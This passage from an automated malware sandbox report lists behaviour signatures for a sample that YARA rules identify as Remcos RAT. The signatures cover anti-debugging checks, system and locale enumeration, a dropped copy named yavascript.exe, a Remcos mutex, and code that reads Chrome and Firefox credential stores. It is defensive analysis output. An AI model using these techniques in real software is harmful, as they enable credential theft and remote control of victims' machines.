            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_020E0083 push dword ptr fs:[00000030h]38_2_020E0083
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021C27BB mov eax, dword ptr fs:[00000030h]38_2_021C27BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218092B mov eax, dword ptr fs:[00000030h]38_2_0218092B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02180D90 mov eax, dword ptr fs:[00000030h]38_2_02180D90
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044E92E GetProcessHeap,0_2_0044E92E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434168
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A65D
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00433B44
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00433CD7 SetUnhandledExceptionFilter,0_2_00433CD7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021243CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_021243CF
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0212A8C4
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02123DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02123DAB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00434168
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043A65D
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00433B44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00433CD7 SetUnhandledExceptionFilter,17_2_00433CD7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007843CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_007843CF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0078A8C4
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00783DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00783DAB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00434168
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043A65D
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00433B44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00433CD7 SetUnhandledExceptionFilter,20_2_00433CD7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_021643CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_021643CF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0216A8C4
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02163DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_02163DAB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00434168
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0043A65D
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00433B44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00433CD7 SetUnhandledExceptionFilter,38_2_00433CD7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B43CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_021B43CF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021BA8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_021BA8C4
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B3DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_021B3DAB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe20_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe38_2_00410F36
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00418754 mouse_event,0_2_00418754
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" Jump to behavior
            Source: yavascript.exe, 00000011.00000002.4625247428.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: yavascript.exe, 00000011.00000002.4625247428.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00433E0A cpuid 0_2_00433E0A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_004470AE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_004510BA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004511E3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_004512EA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004513B7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_00447597
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoA,0_2_0040E679
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00450A7F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_00450CF7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_00450D42
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_00450DDD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00450E6A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_02137315
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_02141321
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_02141044
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0214161E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_021377FE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0214144A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoW,0_2_02141551
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: GetLocaleInfoA,0_2_020FE8E0
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_02140F5E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: EnumSystemLocalesW,0_2_02140FA9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_02140CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,17_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_007A1044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_007A1321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_00797315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_007A144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_007A1551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_007A161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,17_2_007977FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,17_2_0075E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_007A0CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_007A0F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,17_2_007A0FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,20_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_02177315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_02181321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_02181044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_0218161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_021777FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_0218144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,20_2_02181551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,20_2_0213E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_02180F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,20_2_02180FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_02180CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,38_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,38_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,38_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,38_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,38_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021C7315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021D1321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D1044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,38_2_021D161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021C77FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,38_2_021D144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021D1551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,38_2_0218E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D0F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D0FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,38_2_021D0CE6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434010
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041A7A2 GetComputerNameExW,GetUserNameW,0_2_0041A7A2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0044800F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040B21B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040B21B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data20_2_0040B21B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data38_2_0040B21B
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040B335
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: \key3.db0_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \key3.db17_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\20_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \key3.db20_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\38_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: \key3.db38_2_0040B335

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
